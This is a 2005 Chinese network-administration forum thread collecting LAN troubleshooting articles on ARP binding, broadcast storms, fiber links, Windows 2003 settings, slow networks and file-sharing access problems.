作者: 人魔　　时间: 2005-12-30 02:52　　 标题: 局域网经典故障解决

IP与MAC绑定的难题
问：我的计算机原来采用公网固定IP地址。为了避免被他人盗用，使用“arp -s ip mac”命令对MAC地址和IP地址进行了绑定。后来，由于某种原因，又使用“arp -d ip mac”命令取消了绑定。然而，奇怪的是，取消绑定后，在其他计算机上仍然不能使用该IP地址，而只能在我自己的计算机上使用。需要说明的是，我的计算机并不是代理服务器。
答：虽然在TCP/IP网络中，计算机往往需要设置IP地址后才能通讯，然而，实际上计算机之间的通讯并不是通过IP地址，而是借助于网卡的MAC地址。IP地址只是被用于查询欲通讯的目的计算机的MAC地址。
ARP协议是用来向对方的计算机、网络设备通知自己IP对应的MAC地址的。在计算机的ARP 缓存中包含一个或多个表，用于存储 IP 地址及其经过解析的以太网MAC地址。一台计算机与另一台IP地址的计算机通讯后，在ARP缓存中会保留相应的MAC地址。所以，下次和同一个 IP地址的计算机通讯，将不再查询MAC地址，而是直接引用缓存中的MAC地址。另外，需要注意的是，通过“-s”参数添加的项属于静态项，不会造成ARP缓存超时。只有终止TCP/IP协议后再启动，这些项才会被删除。所以，即使你取消了绑定，在短时间内其他计算机将仍然认为你采用的是原有IP地址。
在交换式网络中，交换机也维护一张MAC地址表，并根据MAC地址将数据发送至目的计算机。当绑定IP与MAC地址后，只要与交换机通讯过，交换机就会记录下该MAC地址。这样一来，即使后面有人使用了相同的IP地址，将依然不能与网关通讯，更连不通外面了，除非重新启动交换机、清除MAC表，或者MAC地址表超过了指定的老化时间。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:53　　 标题: 局域网经典故障解决

网络经常瘫痪是为何
问：网吧有70多台计算机，网络每天都会瘫痪一到三次。通常情况下，只需将一级交换机的网线全部拔出后再连上，即可恢复正常，而有时则不得不重启一下交换机。把原来的10Mbps的网卡更换为10/100Mbps网卡后，有近一个星期的时间网络没有瘫痪。然而，这几天网络又开始不正常了。集线设备采用16口和24口的10/100Mbps交换机，代理服务器采用Windows 2000的ICS（Windows连接共享）。请问这一现象的原因是什么?
答：在排除了病毒向网络疯狂发送数据包的可能后可以认为这是典型的由广播风暴导致的网络瘫痪。广播风暴爆发后，网络中传输的全部是广播包，计算机处理的也全部都是广播包，正常的数据包无法得到转发和处理。拔掉网线或关掉交换机后，广播风暴得到扼制，从而恢复正常通讯。
广播可以理解为一个人对在场的所有人说话。这样做的好处是通话效率高，信息一下子就可以传递到网络中的所有计算机。即使没有用户人为地发送广播帧，网络上也会出现一定数量的广播帧。需要注意的是，广播不仅会占用大量的网络带宽，而且还将占用计算机大量的CPU处理时间。广播风暴就是网络长时间被大量的广播数据包所占用，使正常的点对点通信无法正常进行，其外在表现为网络速度奇慢无比，甚至导致网络瘫痪。
导致广播风暴的原因有很多，一块故障网卡、或者一个故障端口都有可能引发广播风暴。
需要注意的是，交换机只能隔离碰撞域，而不能隔离广播域。事实上，当广播包的数量占到通讯总量的30%时，网络的传输效率就会明显下降。
通常情况下，在采用多种通讯协议的网络中，计算机不应多于100台，在采用一种通讯协议的网络中，计算机不应多于150台。如果计算机的数量较多，应采用划分VLAN的方式将网络分隔开来，将大的广播域划分为若干个小的广播域，以减小广播风暴可能造成的危害。
--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:53　　 标题: 局域网经典故障解决

组网实战 局域网网络故障排除策略
作者：天极 资料来源：天极 更新日期：2005-7-14 浏览次数: 404
故障排除过程
    在开始动手排除故障之前，最好先准备一支笔和一个记事本，然后，将故障现象认真仔细记录下来。在观察和记录时一定注意细节，排除大型网络故障如此，一般十几台电脑的小型网络故障也如此，因为有时正是一些最小的细节使整个问题变得明朗化。
    1、识别故障现象
    作为管理员，在你排故障之前，也必须确切地知道网络上到底出了什么毛病，是不能共享资源，还是找不到另一台电脑，如此等等。知道出了什么问题并能够及时识别，是成功排除故障最重要的步骤。为了与故障现象进行对比，作为管理员你必须知道系统在正常情况下是怎样工作的，反之，你是不好对问题和故障进行定位的。
    识别故障现象时，应该向操作者询问以下几个问题:
    (1)当被记录的故障现象发生时，正在运行什么进程(即操作者正在对电脑进行什么操作)。
    (2)这个进程以前运行过吗?
    (3)以前这个进程的运行是否成功?
    (4)这个进程最后一次成功运行是什么时候?
    (5)从那时起，哪些发生了改变?
    带着这些疑问来了解问题，才能对症下药排除故障。
    2、对故障现象进行详细描述
    当处理由操作员报告的问题时，对故障现象的详细描述显得尤为重要。如果仅凭他们的一面之词，有时还很难下结论，这时就需要管理员亲自操作一下刚才出错的程序，并注意出错信息。例如，在使用Web浏览器进行浏览时，无论键入哪个网站都返回“该页无法显示”之类的信息。使用ping命令时，无论ping哪个IP地址都显示超时连接信息等。诸如此类的出错消息会为缩小问题范围提供许多有价值的信息。对此在排除故障前，可以按以下步骤执行:
    (1)收集有关故障现象的信息;
    (2)对问题和故障现象进行详细描述;
    (3)注意细节;
    (4)把所有的问题都记下来;
    (5)不要匆忙下结论。
    3、列举可能导致错误的原因
    作为网络管理员，则应当考虑，导致无法查看信息的原因可能有哪些，如网卡硬件故障、网络连接故障、网络设备(如集线器、交换机)故障、TCP/IP协议设置不当等等。
    注意:不要着急下结论，可以根据出错的可能性把这些原因按优先级别进行排序，一个个先后排除。
    4、缩小搜索范围
    对所有列出的可能导致错误的原因逐一进行测试，而且不要根据一次测试，就断定某一区域的网络是运行正常或是不正常。另外，也不要在自己认为已经确定了的第一个错误上停下来，应直到测试完为止。
    除了测试之外，网络管理员还要注意:千万不要忘记去看一看网卡、Hub、Modem、路由器面板上的LED指示灯。通常情况下，绿灯表示连接正常(Modem需要几个绿灯和红灯都要亮)，红灯表示连接故障，不亮表示无连接或线路不通。根据数据流量的大小，指示灯会时快时慢的闪烁。同时，不要忘记记录所有观察及测试的手段和结果。
    5、隔离错误
    经过你的一番折腾后，这时你基本上知道了故障的部位，对于电脑的错误，你可以开始检查该电脑网卡是否安装好、TCP/IP协议是否安装并设置正确、Web浏览器的连接设置是否得当等一切与已知故障现象有关的内容。然后剩下的事情就是排除故障了。
    注意:在开机箱时，不要忘记静电对电脑的危害，要正确拆卸电脑部件。
    6、故障分析
    处理完问题后，作为网络管理员，还必须搞清楚故障是如何发生的，是什么原因导致了故障的发生，以后如何避免类似故障的发生，拟定相应的对策，采取必要的措施，制定严格的规章制度。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:53　　 标题: 局域网经典故障解决

光纤网络故障排除的几种常用方法
作者：慧锦网络
    首先看光纤收发器或光模块的指示灯和双绞线端口指示灯是否已亮？
    a、如收发器的光口（FX）指示灯不亮，请确定光纤链路是否交*链接？光纤跳线一头是平行方式连接；另一头是交*方式连接。
    b、如A收发器的光口（FX）指示灯亮、B收发器的光口（FX）指示灯不亮，则故障在A收发器端：一种可能是：A收发器（TX）光发送口已坏，因为B收发器的光口（RX）接收不到光信号；另一种可能是：A收发器（TX）光发送口的这条光纤链路有问题（光缆或光线跳线可能断了）。
    c、双绞线（TP）指示灯不亮，请确定双绞线连线是否有错或连接有误？请用通断测试仪检测；
（不过有些收发器的双绞线指示灯须等光纤链路接通后才亮，见网站的IMC光纤收发器调试手册）
    d、有的收发器有两个RJ45端口：（To HUB）表示连接交换机的连接线是直通线；（To Node）表示连接 交换机的连接线是交*线；
    e、有的发器侧面有MPR开关：表示连接交换机的连接线是直通线方式；DTE开关：连接交换机的连接线是 交*线方式。
    2、光缆、光纤跳线是否已断？
    a、光缆通断检测：用激光手电、太阳光、发光体对着光缆接头或偶合器的一头照光；在另一头看是否有　 可见光？如有可见光则表明光缆没有断。
    b、光纤连线通断检测：用激光手电、太阳光等对着光纤跳线的一头照光；在另一头看是否有可见光？如有可见光则表明光纤跳线没有断。
    3、半/全双工方式是否有误？
    有的收发器侧面有FDX开关：表示全双工；HDX开关：表示半双工。
    4、用光功率计仪表检测
    光纤收发器或光模块在正常情况下的发光功率：多模：-10db--18db之间；单模20公里：-8db--15db之间；单模60公里：-5db--12db之间；如果在光纤收发器的发光功率在：-30db--45db之间，那么可以判断这个收发器有问题。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:54　　 标题: 局域网经典故障解决

轻松清除Windows 2003故障
针对服务器的需求，Windows 2003对声卡、显卡等硬件的默认设置做了处理，个人用户在使用时经常会碰到一些“故障”。
1.播放电影时画面粗糙
很多朋友都有这样的“遭遇”：自己的电脑配置相当好，安装了Windows 2003时显卡也能够被自动识别并安装，可是播放电影时画面非常粗糙，安装最新版显卡驱动后画面质量依然如故。其实这 是因为Windows 2003默认的显示选项没有根据个人用户的需要进行优化所致。
解决方法很简单：在桌面上点右键，依次进入“显示属性→设置→高级→疑难解答”，
将“硬件加速”游标向右拖至“完全”，点“确定”退出。然后依次进入“开始→所有程序
→附件→系统工具→系统信息”，选择“工具→DirectX诊断工具”(由于程序搜集系统信
息，所以需要稍微等待一下，可能出现闪屏)，选择“显示”选项卡，依次启用
“DirectDraw Acceleration”和“Direct3D Acceleration”项，点“退出”即可。
2.声卡不工作或者打游戏时声音严重滞后
在Windows 2003中，多数声卡都能继续使用它们在Windows 2000/XP中的驱动程序，而较老的声卡(如帝盟S90等)的驱动就只有手动安装了。在装好声卡以后，用户经常遇到以下两个问题。
1)声卡不工作
驱动安装完成后，在Windows 2003标准版中就可以正常使用声卡了，而在企业版中，系统还是不能发声。解决步骤是：进入“控制面板→声音和音频控制设备”，勾选音频服务”选项，点“确定”后重启计算机即可。
2)玩游戏时声音严重滞后
解决方法是：进入“DirectX诊断工具”，选择“声音”选项卡，在“加速级别”中将
游标向右拖动到“完全加速”，点“退出”即可。
3.IE总是提醒存在安全隐患
“总觉得最新的版本最安全，没想到在Windows 2003下浏览网页时，每访问一个页面，IE都会提醒存在安全隐患，询问是否继续访问，太不方便了”，经常有朋友这样抱怨。
出现这个问题的原因是Windows2003中的IE默认安全级别是“高”，这样虽然安全性得
以提高，但却给我们日常上网带来许多麻烦。建议将安全级别调整到“中’，方法是：启动IE，选择“工具→Internet选项”，在“安全”选项卡中将安全级别设为“中”。
4.运行大型软件时系统反应缓慢
服务器和工作站对系统资源的要求是不相同的，如果我们平时要运行诸如Photoshop、3DSMAX等软件，则应当将系统资源重新分配，修改为类似Windows XP的状态。
设置步骤是：进入“控制面板→系统”选择“高级”选项卡，在“性能”栏里点“设
置”按钮，选择“高级”选项卡，在“处理器计划”和“内存使用”两栏中均选择“程
序”，最后点“确定”并重新启动计算机即可。
经过以上设置，你是不是觉得Windows 2003更亲切了?

--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


局域网速度变慢的故障分析

《一键清理系统垃圾》

局域网速度变慢的故障分析

    在众多的网络故障中，最令人头痛的是网络是通的，但网速变慢。初次面对这类“软”故障时，往往有的人会束手无策。本文为大家介绍引起此类“软”故障常见的原因及排除方法，提高大家对实际问题的处理能力。

    ★网线问题

    我们知道，双绞线是由4对线严格而合理地紧密度绞和在一起，减少串扰和背景噪声的影响。同时，在T568A标准和T568B标准中仅使用了双绞线的1、2和3、6四条线。其中，1、2用于发送，3、6用于接收，而且1、2必须来自一个绕对，3、6必须来自一个绕对。只有这样，才能最大限度的避免串扰，保证数据传输。本人在实践中发现不按正确标准（T586A、T586B）制作的网线，存在很大的隐患。有的开始一段时间使用正常，但过一段时间后，性能下降，网速变慢。因此，我们现在要求一律按T586A、T586B标准来压制网线。

    ★回路问题

    一般当网络较小涉及的节点数不是很多、结构不是很复杂时，这种现象很少发生。但在一些比较复杂的网络中，由于一些原因经常有多余的备用线路，则会构成回路，数据包会不断发送和校验数据，从而影响整体网速，并且查找比较困难。为避免这种情况发生，要求我们在铺设网线时一定要养成良好的习惯，网线打上明显的标签，有备用线路的地方要做好记载。

    ★广播风暴

    作为发现未知设备的主要手段，广播在网络中起着非常重要的作用。然而，随着网络计算机数量的增多，广播包的数量会急剧增加。当广播包的数量达到30%时，网络传输效率将会明显下降。当网卡或网络设备损坏后，会不停地发送广播包，从而导致广播风暴，使网络通信陷于瘫痪。因此，当网络设备硬件有故障时也会引起网速变慢。当怀疑有此类故障时，首先可采用置换法替换集线器或交换机来排除集线设备故障。然后关掉集线器的电源后用ping命令对所涉及计算机逐一测试，找到有故障网卡的计算机，更换新的网卡可恢复网速正常。

    ★端口瓶颈

    实际上路由器的广域网端口和局域网端口、交换机端口、集线器端口和服务器网卡等都有可能成为网络瓶颈。我们可在网络使用高峰时段，利用网管软件查看路由器、交换机、服务器端口的数据流量（用netstat命令也可统计各个端口的数据流量），确认网络数据流通瓶颈的位置，设法增加其带宽。如更换服务器网卡为100M或1000M、安装多个网卡、通过改变路由器上配置来增加带宽等方法都可以有效地缓解网络瓶颈，最大限度地提高数据传输速度。

    ★蠕虫病毒

    蠕虫病毒对网络速度的影响越来越严重。这种病毒导致被感染的用户只要一连上网就不停地往外发邮件，病毒选择用户个人电脑中的随机文档附加在用户机子上的通讯簿的随机地址进行邮件发送。成百上千的这种垃圾邮件有的排着队往外发送，有的又成批成批地被退回来堆在服务器上。造成个别骨干互联网出现明显拥塞，个别局域网近于瘫痪。因此，我们应时常注意各种新病毒通告，了解各种病毒特征；及时升级所用杀毒软件。计算机也要及时升级、安装系统补丁程序；同时卸载不必要的服务，关闭不必要的端口，以提高系统的安全性和可靠性。

    总之，计算机网络的应用越来越广泛，如何提高计算机网络的管理水平，不断学习，注重理论知识和实践经验积累相当重要。

    希望这篇文章能够解决长期困扰大家的问题。


局域网网络故障排除策略(上)

《一键清理系统垃圾》

局域网网络故障排除策略(上)

当我们组建好了一个小型网吧后，为了使网吧运转正常，网络维护就显得很重要了。由于网络协议和网络设备的复杂性，许多故障解决起来绝非像解决单机故障那么简单。网络故障的定位和排除，既需要长期的知识和经验积累，也需要一系列的软件和硬件工具，更需要你的智慧。因此，多学习各种最新的知识，是每个网络管理员都应该做到的。

    故障排除过程

    在开始动手排除故障之前，最好先准备一支笔和一个记事本，然后，将故障现象认真仔细记录下来。在观察和记录时一定注意细节，排除大型网络故障如此，一般十几台电脑的小型网络故障也如此，因为有时正是一些最小的细节使整个问题变得明朗化。

    1.识别故障现象

    作为管理员，在你排故障之前，也必须确切地知道网络上到底出了什么毛病，是不能共享资源，还是找不到另一台电脑，如此等等。知道出了什么问题并能够及时识别，是成功排除故障最重要的步骤。为了与故障现象进行对比，作为管理员你必须知道系统在正常情况下是怎样工作的，反之，你是不好对问题和故障进行定位的。

    识别故障现象时，应该向操作者询问以下几个问题：

    (1)当被记录的故障现象发生时，正在运行什么进程(即操作者正在对电脑进行什么操作)。

    (2)这个进程以前运行过吗？

    (3)以前这个进程的运行是否成功？

    (4)这个进程最后一次成功运行是什么时候？

    (5)从那时起，哪些发生了改变？

    带着这些疑问来了解问题，才能对症下药排除故障。

    2.对故障现象进行详细描述

    当处理由操作员报告的问题时，对故障现象的详细描述显得尤为重要。如果仅凭他们的一面之词，有时还很难下结论，这时就需要管理员亲自操作一下刚才出错的程序，并注意出错信息。例如，在使用Web浏览器进行浏览时，无论键入哪个网站都返回“该页无法显示”之类的信息。使用ping命令时，无论ping哪个IP地址都显示超时连接信息等。诸如此类的出错消息会为缩小问题范围提供许多有价值的信息。对此在排除故障前，可以按以下步骤执行：

    (1)收集有关故障现象的信息；

    (2)对问题和故障现象进行详细描述；

    (3)注意细节；

    (4)把所有的问题都记下来；

    (5)不要匆忙下结论。

    3.列举可能导致错误的原因

    作为网络管理员，则应当考虑，导致无法查看信息的原因可能有哪些，如网卡硬件故障、网络连接故障、网络设备(如集线器、交换机)故障、TCP/IP协议设置不当等等。

    注意：不要着急下结论，可以根据出错的可能性把这些原因按优先级别进行排序，一个个先后排除。

    4.缩小搜索范围

    对所有列出的可能导致错误的原因逐一进行测试，而且不要根据一次测试，就断定某一区域的网络是运行正常或是不正常。另外，也不要在自己认为已经确定了的第一个错误上停下来，应直到测试完为止。

    除了测试之外，网络管理员还要注意：千万不要忘记去看一看网卡、Hub、Modem、路由器面板上的LED指示灯。通常情况下，绿灯表示连接正常(Modem需要几个绿灯和红灯都要亮)，红灯表示连接故障，不亮表示无连接或线路不通。根据数据流量的大小，指示灯会时快时慢的闪烁。同时，不要忘记记录所有观察及测试的手段和结果。

    5.隔离错误

    经过你的一番折腾后，这时你基本上知道了故障的部位，对于电脑的错误，你可以开始检查该电脑网卡是否安装好、TCP/IP协议是否安装并设置正确、Web浏览器的连接设置是否得当等一切与已知故障现象有关的内容。然后剩下的事情就是排除故障了。

    注意：在开机箱时，不要忘记静电对电脑的危害，要正确拆卸电脑部件。

    6.故障分析

    处理完问题后，作为网络管理员，还必须搞清楚故障是如何发生的，是什么原因导致了故障的发生，以后如何避免类似故障的发生，拟定相应的对策，采取必要的措施，制定严格的规章制度。

    故障原因

    虽然故障原因多种多样，但总的来讲不外乎就是硬件问题和软件问题，说得再确切一些，这些问题就是网络连接性问题、配置文件选项问题及网络协议问题。

    1.网络连接性

    网络连接性是故障发生后首先应当考虑的原因。连通性的问题通常涉及到网卡、跳线、信息插座、网线、Hub、Modem等设备和通信介质。其中，任何一个设备的损坏，都会导致网络连接的中断。连通性通常可采用软件和硬件工具进行测试验证。例如，当某一台电脑不能浏览Web时，在网络管理员的脑子里产生的第一个想法就是网络连通性的问题。到底是不是呢？可以通过测试进行验证。看得到网上邻居吗？可以收发电子邮件吗？ping得到网络内的其他电脑吗？只要其中一项回答为“yes”，那就可以断定本机到Hub的连通性没有问题。当然，即使都回答“No”，也不就表明连通性肯定有问题，而是可能会有问题，因为如果电脑的网络协议的配置出现了问题也会导致上述现象的发生。另外，看一看网卡和Hub接口上的指示灯是否闪烁及闪烁是否正常也是个不坏的主意。

    排除了由于电脑网络协议配置不当而导致故障的可能后，就应该查看网卡和Hub的指示灯是否正常，测量网线是否畅通。

    2.配置文件和选项

    服务器、电脑都有配置选项，配置文件和配置选项设置不当，同样会导致网络故障。如服务器权限的设置不当，会导致资源无法共享的故障。电脑网卡配置不当，会导致无法连接的故障。当网络内所有的服务都无法实现时，应当检查Hub。

    3.网络协议

    没有网络协议，网络设备和电脑之间就无法通信，是不能实现资源共享Modem上网的。


局域网网络故障排除策略(下)

《一键清理系统垃圾》

局域网网络故障排除策略(下)

连通性故障

    1.故障表现

    连通性故障通常表现为以下几种情况：

    ①电脑无法登录到服务器；

    ②电脑无法通过局域网接入Internet；

    ③电脑在“网上邻居”中只能看到自己，而看不到其他电脑，从而无法使用其他电脑上的共享资源和共享打印机；

    ④电脑无法在网络内实现访问其他电脑上的资源；

    ⑤网络中的部分电脑运行速度异常的缓慢。

    2.故障原因

    以下原因可能导致连通性故障：

    ①网卡未安装，或未安装正确，或与其他设备有冲突；

    ②网卡硬件故障；

    ③网络协议未安装，或设置不正确；

    ④网线、跳线或信息插座故障；

    ⑤Hub电源未打开，Hub硬件故障，或Hub端口硬件故障;

    ⑥UPS电源故障。

    3.排除方法

    ①确认连通性故障

    当出现一种网络应用故障时，如无法接入Internet，首先尝试使用其他网络应用，如查找网络中的其他电脑，或使用局域网中的Web浏览等。如果其他网络应用可正常使用，如虽然无法接入Internet，却能够在“网上邻居”中找到其他电脑，或可ping到其他电脑，即可排除连通性故障原因。如果其他网络应用均无法实现，继续下面操作。

    ②看LED灯判断网卡的故障

    首先查看网卡的指示灯是否正常。正常情况下，在不传送数据时，网卡的指示灯闪烁较慢，传送数据时，闪烁较快。无论是不亮，还是长亮不灭，都表明有故障存在。如果网卡的指示灯不正常，需关掉电脑更换网卡。对于Hub的指示灯，凡是插有网线的端口，指示灯都亮。由于是Hub，所以，指示灯的作用只能指示该端口是否连接有终端设备，不能显示通信状态。

    ③用ping命令排除网卡故障

    使用ping命令，ping本地的IP地址或电脑名(如ybgzpt)，检查网卡和IP网络协议是否安装完好。如果能ping通，说明该电脑的网卡和网络协议设置都没有问题。问题出在电脑与网络的连接上。因此，应当检查网线和Hub及Hub的接口状态，如果无法ping通，只能说明TCP/IP协议有问题。这时可以在电脑的“控制面板”的“系统”中，查看网卡是否已经安装或是否出错。如果在系统中的硬件列表中没有发现网络适配器，或网络适配器前方有一个黄色的“！”，说明网卡未安装正确。需将未知设备或带有黄色的“！”网络适配器删除，刷新后，重新安装网卡。并为该网卡正确安装和配置网络协议，然后进行应用测试。如果网卡无法正确安装，说明网卡可能损坏，必须换一块网卡重试。如果网卡安装正确则原因是协议未安装。

    ④如果确定网卡和协议都正确的情况下，还是网络不通，可初步断定是Hub和双绞线的问题。为了进一步进行确认，可再换一台电脑用同样的方法进行判断。如果其他电脑与本机连接正常，则故障一定是先前的那台电脑和Hub的接口上。

    ⑤如果确定Hub有故障，应首先检查Hub的指示灯是否正常，如果先前那台电脑与Hub连接的接口灯不亮说明该Hub的接口有故障(Hub的指示灯表明插有网线的端口，指示灯亮，指示灯不能显示通信状态)。

    ⑥如果Hub没有问题，则检查电脑到Hub的那一段双绞线和所安装的网卡是否有故障。判断双绞线是否有问题可以通过“双绞线测试仪”或用两块三用表分别有两个人在双绞线的两端测试。主要测试双绞线的1、2和3、6四条线(其中1、2线用于发送，3、6线用于接收)。如果发现有一根不通就要重新制作。

    通过上面的故障压缩，我们就可以判断故障出在网卡、双绞线或Hub上。

    协议故障

    1.协议故障的表现

    协议故障通常表现为以下几种情况：

    ①电脑无法登录到服务器。

    ②电脑在“网上邻居”中既看不到自己，也无法在网络中访问其他电脑。

    ③电脑在“网上邻居”中能看到自己和其他成员，但无法访问其他电脑。

    ④电脑无法通过局域网接入Internet。

    2.故障原因分析

    ①协议未安装：实现局域网通信，需安装NetBEUI协议。

    ②协议配置不正确：TCP/IP协议涉及到的基本参数有四个，包括IP地址、子网掩码、DNS、网关，任何一个设置错误，都会导致故障发生。

    3.排除步骤

    当电脑出现以上协议故障现象时，应当按照以下步骤进行故障的定位：

    ①检查电脑是否安装TCP/IP和NetBEUI协议，如果没有，建议安装这两个协议，并把TCP/IP参数配置好，然后重新启动电脑。

    ②使用ping命令，测试与其他电脑的连接情况；

    ③在“控制面板”的“网络”属性中，单击“文件及打印共享”按钮，在弹出的“文件及打印共享”对话框中检查一下，看看是否选中了“允许其他用户访问我的文件”和“允许其他电脑使用我的打印机”复选框，或者其中的一个。如果没有，全部选中或选中一个。否则将无法使用共享文件夹；

    ④系统重新启动后，双击“网上邻居”，将显示网络中的其他电脑和共享资源。如果仍看不到其他电脑，可以使用“查找”命令，能找到其他电脑，就一切OK了；

    ⑤在“网络”属性的“标识”中重新为该电脑命名，使其在网络中具有惟一性。

    配置故障

    配置错误也是导致故障发生的重要原因之一。网络管理员对服务器、路由器等的不当设置自然会导致网络故障，电脑的使用者(特别是那些似懂非懂的初学者)对电脑设置的修改，也往往会产生一些令人意想不到的访问错误。

    1.故障表现及分析

    配置故障更多的时候是表现在不能实现网络所提供的各种服务上，如不能访问某一台电脑等。因此，在修改配置前，必须做好原有配置的记录，并最好进行备份。

    配置故障通常表现为以下几种：

    ①电脑只能与某些电脑而不是全部电脑进行通信；

    ②电脑无法访问任何其他设备。

    2.配置故障排错步骤

    首先检查发生故障电脑的相关配置。如果发现错误，修改后，再测试相应的网络服务能否实现。如果没有发现错误，或相应的网络服务不能实现，执行下述步骤。

    测试系统内的其他电脑是否有类似的故障，如果有同样的故障，说明问题出在网络设备上，如Hub。反之，检查被访问电脑对该访问电脑所提供的服务作认真的检查。

    电脑的故障虽然多种多样，但并非无规律可循。随着理论知识和经验技术的积累，故障排除将变得越来越快、越来越简单。严格的网络管理，是减少网络故障的重要手段；完善的技术档案，是排除故障的重要参考；有效的测试和监视工具则是预防、排除故障的有力助手。


局域网文件拷备速度奇慢问题解决三例

《一键清理系统垃圾》

局域网文件拷备速度奇慢问题解决三例

    1．电脑配置如下：华硕TUV4X主板，赛扬1G，128M内存，20G硬盘，3com905b网卡，win98系统，以前访问局域网速度较快，如今上Internet网正常，能访问局域网的其它计算机，但拷贝2M文件要十多分钟，且大多情况下，拷贝过程会中会中断，提示数据出错，而其它电脑拷贝同一文件不须1分钟，证明局域网正常，于是删除TCP/IP协议，重新安装这两种协议，问题依旧，考虑到可能网卡跟其它配件的中断号冲突，干脆更换了一张3com905C网卡，并更换了另一个PCI插槽后，拷贝文件恢复正常。

    2．电脑配置基本与1相同，同样是win98操作系统，能访问局域网的其它计算机，从其它计算机拷贝4M以上文件时，在拷贝过程中会提示该文件无法被复制，在更换网卡、更换插槽后，过几天又出现此故障，更换了2次网卡（此2张网卡在其它电脑能正常工作），更换了所有PCI插槽，问题依旧，怀疑WIN98系统有问题，覆盖安装win98也无济于事了，因不想格式化重装WIN98，于是安装了win2000，在win2000下第三张网卡使用了两个多月都很正常。

    3．电脑配置基本与1相同，安装为win2000系统，有时可上网、有时则不行，从其它计算机拷贝文件时很慢，进入“控制面板”-“系统”-“设备管理器”中将网卡删除，再重新安装网卡驱动时，故障依旧，这时发现该网卡与声卡、显卡同样使用中断号11，因不能修改网卡的中断号，故将该网卡更换到另一个PCI插槽，网卡的中断号变为10，上网、拷文件等一切正常。

    以上三种问题在我维护过程中遇到多次，一般情况下都是网卡与主板的兼容性不好而引起，如遇到局域网拷贝文件非常慢这种问题时，不妨先将网卡更换其它插槽试试。


无法访问的解决方法集锦

《一键清理系统垃圾》

无法访问的解决方法集锦

LBHIDDEN[0]LBHIDDEN在局域网内安装了Windows XP的电脑不能与安装了Windows 98的电脑互相访问，安装了Windows XP的电脑与安装了Windows XP的电脑也不能互相通信。在工作站访问服务器时，工作站的“网上邻居”中可以看到服务器的名称，但是点击后却无法看到任何共享内容,或者提示找不到网络径、无权访问等问题，归纳为以下几点：
在XP首次使用的时候要在网上邻居的属性里面新建一个网络连接进行网络安装向导。
1、检查计算机之间的物理连接
网卡是网络连接的基本设备，在桌面计算机中，每个网卡后面的指示灯应该是亮的，这表示连接是正常的。如果不亮，请检查集线器或交换机是打开的，而且每个客户端连接的指示灯都是亮的，这表示链接是正常的。接下来检查网线的水晶头是否接触良好。
2、确保所有计算机上都安装了TCP/IP，并且工作正常
在Windows XP中默认安装了TCP/IP。但是，如果出了网络问题想卸载后重新安装TCP/IP就不容易了：在“本地连接”属性中显示的此连接使用下列项目列表中单击Internet协议(TCP/IP)项，您将发现卸载按钮不可用(被禁用)。这是因为传输控制协议/Internet协议(TCP/IP)堆栈是Microsoft XP/ 2003的核心组件，不能删除。在这种情况下，如果需要重新安装TCP/IP以使TCP/IP堆栈恢复为原始状态。可以使用NetShell实用程序重置TCP/IP堆栈，使其恢复到初次安装操作系统时的状态。方法是：在命令提示符后键入以下命令，然后按ENTER键：netsh int ip reset c:\resetlog.txt，其中，Resetlog.txt记录命令结果的日志文件，一定要指定，这里指定了Resetlog.txt日志文件及完整路径。运行此命令的结果与删除并重新安装TCP/IP协议的效果相同。
3、使用ping命令测试网络中两台计算机之间的连接
ping其它计算机IP，在命令提示处，键入ping x.x.x.x(其中x.x.x.x是另一台计算机的IP地址)，然后按ENTER键。应该可以看到来自另一台计算机的几个答复，如：
Reply from x.x.x.x:bytes=32 time<1ms TTL=128

如果没有看到这些答复，或者看到"Request timed out"，说明本地计算机可能有问题。如果ping命令成功执行，那么您就确定了计算机可以正确连接，可以跳过下一步。如果没有看到这些答复，或者看到"Request timed out"，说明本地计算机可能有问题。PING本地IP，如果看到"Request timed out"，说明本地计算机可能有问题。

4、使用ping命令测试网络中名称解析是否正常
ping computername，其中computername是远程计算机的名称。通过ping命令用名称测试计算机连接。确定计算机的名称的方法是：在命令提示处，输入SYSTEMINFO。或者在桌面上右击我的电脑-属性，然后单击计算机名称选项卡。如果看到该命令的成功答复，说明您在计算机之间具有基本连接和名称解析。名称解析跟NETBIOS密切相关，看下面的步骤。

5、正确安装网络组件
首先右击网上邻居-属性，选择要共享的网卡。把IP设置在局域网的同一个网段上。比如192.168.1.X网段。然后看一下TCP/IP的高级属性中，是否开启NETBIOS。在利用WINNT4.0构建的网络系统中，对每一台主机的唯一标识信息是它的NetBIOS名，系统是利用WINS服务、信息广播方式及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址，从而实现信息通讯。
在内部网络系统中(也就是通常我们所说的局域网中)，利用NetBIOS名实现信息通讯是非常方便、快捷的。但是在Internet上对一台主机的唯一标识信息是它的FQDN格式的域名(163.com)，在Internet是利用DNS标准来实现将域名解析为相应IP地址，WIN2K支持动态DNS，运行活动目录服务的机器可动态地更新DNS表。
WIN2K网络中可以不再需要WINS服务，但是WIN2K仍然支持WINS，这是由于向后兼容的原因。目前，大多数网络是混合网，既有Win98等系统，又有WINXP/WIN2K等系统，因此需要在TCP/IP协议上捆绑NETBIOS解析计算机名。查看是否选定“文件和打印服务”组件，如果已将其取消选中，“浏览服务”将不绑定到NetBIOS接口。成为备份浏览器并且没有启用“文件和打印共享”的基于Windows的计算机无法将浏览列表与客户机共享。任何将要包括在浏览列表中的计算机也都必须启用“文件和打印共享”。

6、启用打印与文件共享
在网上邻居和本地连接属性里可以看到是否安装了打印机与文件共享。验证：如果在网上邻居中看不到自己的机器，说明你没有安装打印机与文件共享。

7、启动"计算机浏览器"服务
计算机浏览器"服务在网络上维护一个计算机更新列表，并将此列表提供给指定为浏览器的计算机。如果停止了此服务，则既不更新也不维护该列表。WIN2K/XP要确保计算机浏览服务正常启动。打开计算机管理－>服务和应用程序－>服务，在右窗中确保“Computer Browser”没有被停止或禁用。

8、运行网络标识向导
我的电脑选择“属性”，然后单击“计算机名”选项卡单击“网络 ID”按钮，开始“网络标识向导”：单击“下一步”，选择“本机是商业网络的一部分，用它连接到其他工作着的计算机”；单击“下一步”，选择“公司使用没有域的网络”；单击“下一步”按钮，然后输入你的局域网的工作组名，再次单击“下一步”按钮，最后单击“完成”按钮完成设置。

9、Win2k安装NetBEUI协议
在Win2k中NetBEUI协议是一个高效协议在局域网中使，因此必须安装此协议：
